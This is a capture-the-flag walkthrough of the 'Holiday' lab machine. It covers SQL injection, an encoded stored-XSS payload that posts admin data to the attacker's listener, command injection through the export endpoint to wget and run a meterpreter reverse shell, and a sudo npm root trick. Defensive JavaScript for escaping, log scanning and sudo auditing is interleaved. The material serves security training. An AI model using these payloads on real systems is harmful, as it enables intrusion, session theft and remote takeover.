Difficulty Rating:

Machine: Holiday
OS: Linux
Target IP: 10.10.10.25
Source IP: 10.10.15.8

  • Nmap
$ nmap -A -sV -Pn -O -oN holiday_nmap.txt 10.10.10.25

# Nmap 7.60 scan initiated Mon Aug 21 11:07:46 2017 as: nmap -A -sV -Pn -O -oN holiday_nmap.txt 10.10.10.25
Nmap scan report for 10.10.10.25
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c3:aa:3d:bd:0e:01:46:c9:6b:46:73:f3:d1:ba:ce:f2 (RSA)
|   256 b5:67:f5:eb:8d:11:e9:0f:dd:f4:52:25:9f:b1:2f:23 (ECDSA)
|_  256 79:e9:78:96:c5:a8:f4:02:83:90:58:3f:e5:8d:fa:98 (EdDSA)
8000/tcp open  http    Node.js Express framework
|_http-title: Error
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=8/21%OT=22%CT=1%CU=36959%PV=Y%DS=2%DC=T%G=Y%TM=599A71D
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=I%TS=8)SEQ(SP=1
OS:06%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=109%TI=Z%TS=8)
OS:OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54D
OS:ST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
OS:ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   175.31 ms 10.10.14.1
2   179.22 ms 10.10.10.25

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 21 11:08:32 2017 -- 1 IP address (1 host up) scanned in 46.45 seconds

  • Ports 8000 and 22 are open
  • Dirsearch
$ python3 ~/dirsearch/dirsearch.py -u http://10.10.10.25:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -r -f -t 100 --plain-text-report=holiday_dirsearch01.txt

301   165B   http://10.10.10.25:8000/img
200   621B   http://10.10.10.25:8000/
200     1KB  http://10.10.10.25:8000/login
302    28B   http://10.10.10.25:8000/admin
301   165B   http://10.10.10.25:8000/css
200     1KB  http://10.10.10.25:8000/Login
301   163B   http://10.10.10.25:8000/js
302    28B   http://10.10.10.25:8000/logout
302    28B   http://10.10.10.25:8000/agent
302    28B   http://10.10.10.25:8000/Admin
302    28B   http://10.10.10.25:8000/Logout
200   621B   http://10.10.10.25:8000/
200     1KB  http://10.10.10.25:8000/LogIn
302    28B   http://10.10.10.25:8000/Agent
200     1KB  http://10.10.10.25:8000/LOGIN
  • Entering `username` as the username and `password` as the password returns a response that reveals the username RickA

  • SQLmap

$ sqlmap -r holiday_post_request.txt --level 5 --risk 3 --dump-all --threads=10

+----+--------+----------+----------------------------------+
| id | active | username | password                         |
+----+--------+----------+----------------------------------+
| 1  | 1      | RickA    | fdc8cd4cff2c19e0d1022e78481ddf36 |
+----+--------+----------+----------------------------------+
  • Look up the MD5 hash at https://hashkiller.co.uk/md5-decrypter.aspx
  • The hash cracks to: nevergonnagiveyouup
  • Log in with username RickA and password nevergonnagiveyouup
  • User Cookie: connect.sid=s:b51686d0-8708-11e7-abf7-238ba7a6e637.l/GbNaPbN93vtrG3O1WzBUCTL0kG/Z6eg+2InuPb2Mo

  • To get admin’s cookie:
    • Login using above username and password.
    • Visit one of the UUIDs. We’ll visit: http://10.10.10.25:8000/vac/8dd841ff-3f44-4f2b-9324-9a833e2c6b65
    • The notes section is vulnerable to XSS
    • Start nc listening on port 4567: nc -nvlp 4567
    • Enter the below code in notes:
      <img src="x/><script>eval(String.fromCharCode(118, 97, 114, 32, 117, 114, 108, 32, 61, 32, 34, 104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 48, 48, 47, 118, 97, 99, 47, 56, 100, 100, 56, 52, 49, 102, 102, 45, 51, 102, 52, 52, 45, 52, 102, 50, 98, 45, 57, 51, 50, 52, 45, 57, 97, 56, 51, 51, 101, 50, 99, 54, 98, 54, 53, 34, 59, 32, 36, 46, 97, 106, 97, 120, 40, 123, 32, 109, 101, 116, 104, 111, 100, 58, 32, 34, 71, 69, 84, 34, 44, 117, 114, 108, 58, 32, 117, 114, 108, 44, 115, 117, 99, 99, 101, 115, 115, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 100, 97, 116, 97, 41, 32, 123, 32, 36, 46, 112, 111, 115, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 49, 48, 46, 49, 48, 46, 49, 53, 46, 53, 51, 58, 52, 53, 54, 55, 47, 34, 44, 32, 100, 97, 116, 97, 41, 59, 125, 125, 41, 59));</script>">
    
    • After a few seconds you’ll get a request on your listener.
    • The request contains the admin cookie
  • Admin Cookie:
connect.sid=s%3A125ed5c0-93b8-11e7-b36a-63cfaaf6bfb4.QhCcyezXRvtUrcLBOWG%2BmK%2B53mKvdVCLbC5owsYs68g
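The cookie theft above works because the notes field is stored and later rendered as live HTML. The block below is an added example, not the writeup's or the Holiday application's code, showing the fix at the point of output: HTML-escaping the note so the browser treats it as text, plus a small check that confirms nothing tag-like survives in the rendered fragment. The wrapper markup is an assumption, and the sample note is a shortened copy of the payload shape used above.

```javascript
// Added example (not from the Holiday writeup or the box's own code).
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape the five characters that can change HTML structure or attribute
// boundaries. Applied at output time, so the stored note can be anything.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Assumed template for a booking's notes block.
function renderNote(note) {
  return `<div class="note">${escapeHtml(note)}</div>`;
}

// Reviewer/test check: outside the fixed wrapper there must be no characters
// that could open or close a tag. Anything that fails this was not escaped.
function hasRawMarkup(rendered) {
  const inner = rendered
    .replace(/^<div class="note">/, "")
    .replace(/<\/div>$/, "");
  return /[<>]/.test(inner);
}

// Constructed sample with the same shape as the writeup's payload
// (script body shortened); it is only ever treated as text here.
const SAMPLE_NOTE = '<img src="x/><script>eval(String.fromCharCode(1,2,3));</script>">';
```

Escaping on output is the control that holds regardless of what a stored value looks like; a filter that tries to recognise and remove "bad" tags on input is the kind of defence that payloads like the encoded one above are built to walk past.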
  • With the admin cookie set, log in as admin and go to http://10.10.10.25:8000/admin
  • This page is vulnerable to remote command execution (RCE), triggered with:
    /admin/export?table=bookings%26ls
    
  • This executes the ls command

Note: %26 (URL-encoded &) is required instead of a literal & because & is filtered
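As an added example (not code from the writeup or from the Holiday application), two defender-side checks for the export endpoint described above: an allowlist the handler should apply to `table` before the value can reach a shell, and a scanner over constructed access-log lines that decodes the query string and flags the pattern shown here, including `%26`-encoded separators and a host written as a bare decimal integer as in the wget command later in this writeup. The table names, the log format and the request paths are assumptions.

```javascript
// Added example (not from the Holiday writeup or the box's own code).
const ALLOWED_TABLES = new Set(["bookings", "users"]); // assumed table names

// The handler-side fix: only a known table name may be exported. Anything
// else is rejected before a command line is ever built.
function isAllowedTable(name) {
  return ALLOWED_TABLES.has(name);
}

// Characters that let one shell command become several or change redirection.
const SHELL_META = /[&|;`$(){}\n<>]/;

// 168431413 -> "10.10.15.53": integer-form hosts are a common way to dodge
// naive IP pattern matching, so normalise them for review.
function decimalToDottedIp(dec) {
  const n = Number(dec);
  if (!Number.isInteger(n) || n < 0 || n > 0xffffffff) return null;
  return [24, 16, 8, 0].map((s) => (n >>> s) & 0xff).join(".");
}

function findDecimalHosts(text) {
  const out = [];
  for (const m of text.matchAll(/(?:https?:\/\/)?\b(\d{8,10})\/\S*/g)) {
    const ip = decimalToDottedIp(m[1]);
    if (ip) out.push(ip);
  }
  return out;
}

// Inspect one common-log-format request line (assumed format). Returns null
// for requests that are not to the export endpoint.
function inspectRequestLine(line) {
  const m = line.match(/"(GET|POST) (\S+) HTTP\/[\d.]+"/);
  if (!m) return null;
  const u = new URL(m[2], "http://localhost:8000");
  if (u.pathname !== "/admin/export") return null;
  // searchParams decodes %26 to & and + to space, i.e. what the app sees.
  const table = u.searchParams.get("table") || "";
  const reasons = [];
  if (!isAllowedTable(table)) reasons.push("table not in allowlist");
  if (SHELL_META.test(table)) reasons.push("shell metacharacter in table");
  const hosts = findDecimalHosts(table);
  if (hosts.length) reasons.push(`decimal IP host -> ${hosts.join(",")}`);
  return { table, reasons, suspicious: reasons.length > 0 };
}

function scanLog(lines) {
  return lines.map(inspectRequestLine).filter((r) => r && r.suspicious);
}

// Constructed sample log lines (not captured from the box).
const SAMPLE_LOG = [
  '10.10.15.53 - - [21/Aug/2017:11:30:01 +0000] "GET /admin/export?table=bookings HTTP/1.1" 200 512',
  '10.10.15.53 - - [21/Aug/2017:11:30:09 +0000] "GET /admin/export?table=bookings%26ls HTTP/1.1" 200 140',
  '10.10.15.53 - - [21/Aug/2017:11:31:40 +0000] "GET /admin/export?table=bookings%26cd+/tmp%26%26wget+168431413/shellpt HTTP/1.1" 200 30',
  '10.10.15.53 - - [21/Aug/2017:11:32:00 +0000] "GET /login HTTP/1.1" 200 1024',
];
```

The allowlist is the control that removes the bug; the log scan is what tells you whether it was hit before the fix shipped. Decoding the query with `URL` matters: matching on the raw `%26` text would miss any request that encoded the separator differently.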

  • View the output in Burp or in the page source
  • Use the same technique to upload the payload:
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.15.53 LPORT=4444 -f elf > shell
$ sudo python -m SimpleHTTPServer 80 
Serving HTTP on 0.0.0.0 port 80 ...
  • Start exploit/multi/handler from msf

  • Request these URLs from the browser or Burp Repeater:

 /admin/export?table=bookings%26cd+/tmp%26%26wget+168431413/shellpt
 /admin/export?table=bookings%26chmod+777+/tmp/shellpt
 /admin/export?table=bookings%26/tmp/shellpt
  • Once the shell connects back, read user.txt

User Owned!

algernon@holiday:/home/algernon/app$ sudo -l
Matching Defaults entries for algernon on holiday:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User algernon may run the following commands on holiday:
    (ALL) NOPASSWD: /usr/bin/npm i *

algernon@holiday:/home/algernon/app$ mv package.json package.json.bak
algernon@holiday:/home/algernon/app$ ln -s /root/root.txt package.json && sudo /usr/bin/npm i *

npm ERR! Linux 4.4.0-78-generic
npm ERR! argv "/usr/bin/nodejs" "/usr/bin/npm" "i" "hex.db" "index.js" "layouts" "node_modules" "npm-debug.log" "package.json" "package.json.bak" "setup" "static" "views"
npm ERR! node v6.10.3
npm ERR! npm  v3.10.10
npm ERR! file /home/algernon/app/package.json
npm ERR! code EJSONPARSE

npm ERR! Failed to parse json
npm ERR! Unexpected token 'a' at 1:1
npm ERR! {root-flag}
npm ERR! ^
npm ERR! File: /home/algernon/app/package.json
npm ERR! Failed to parse package.json data.
User and Root owned!!
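The root step above rests on a single sudo rule: root may run `npm i` with any arguments and no password, and npm reads whatever `package.json` is in the working directory (here a symlink to the flag) and echoes it back in its parse error. The block below is an added example, not from the writeup or the box, of an audit pass over the text `sudo -l` prints that flags rules of this kind. The sample output is constructed to mirror the box's rule, with a benign second rule added for contrast; the rule-line format it parses is the one shown in the writeup.

```javascript
// Added example (not from the Holiday writeup or the box's own code).

// Binaries that execute arbitrary code or read caller-controlled files as
// a matter of course, so granting them via sudo is granting the root shell.
const RISKY_BINARIES = {
  // npm install reads package.json from the working directory and runs the
  // package's lifecycle scripts (preinstall/postinstall) as the invoking user.
  "/usr/bin/npm": "npm runs package lifecycle scripts and reads package.json",
};

// Parse the "(runas) TAG: command args" lines that follow the
// "may run the following commands" header in sudo -l output.
function parseSudoRules(text) {
  const rules = [];
  let inRules = false;
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (/may run the following commands/.test(line)) { inRules = true; continue; }
    if (!inRules || !line) continue;
    const m = line.match(/^\((\S+?)(?::(\S+))?\)\s+((?:\w+:\s*)*)(.+)$/);
    if (!m) continue;
    const tags = m[3].split(":").map((t) => t.trim()).filter(Boolean);
    const [command, ...args] = m[4].trim().split(/\s+/);
    rules.push({ runAs: m[1], tags, command, args });
  }
  return rules;
}

// Return one finding per rule that deserves a second look, with reasons.
function auditSudoRules(text) {
  const findings = [];
  for (const r of parseSudoRules(text)) {
    const reasons = [];
    if (r.tags.includes("NOPASSWD")) reasons.push("no password required");
    if (r.args.some((a) => /[*?\[]/.test(a))) {
      reasons.push("wildcard argument lets the caller choose files and flags");
    }
    if (RISKY_BINARIES[r.command]) reasons.push(RISKY_BINARIES[r.command]);
    if (r.command === "ALL") reasons.push("any command");
    if (reasons.length) findings.push({ runAs: r.runAs, command: r.command, args: r.args, reasons });
  }
  return findings;
}

// Constructed sample mirroring the box's rule, plus a benign rule for contrast.
const SAMPLE_SUDO_L = [
  "Matching Defaults entries for algernon on holiday:",
  "    env_reset, mail_badpass,",
  "",
  "User algernon may run the following commands on holiday:",
  "    (ALL) NOPASSWD: /usr/bin/npm i *",
  "    (root) /usr/bin/apt-get update",
].join("\n");
```

The remediation the audit points at is to drop the wildcard and the `NOPASSWD` tag and, if unprivileged users really need to install packages for the app, to expose a fixed wrapper script with no caller-controlled arguments rather than `npm` itself.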

Share the fun!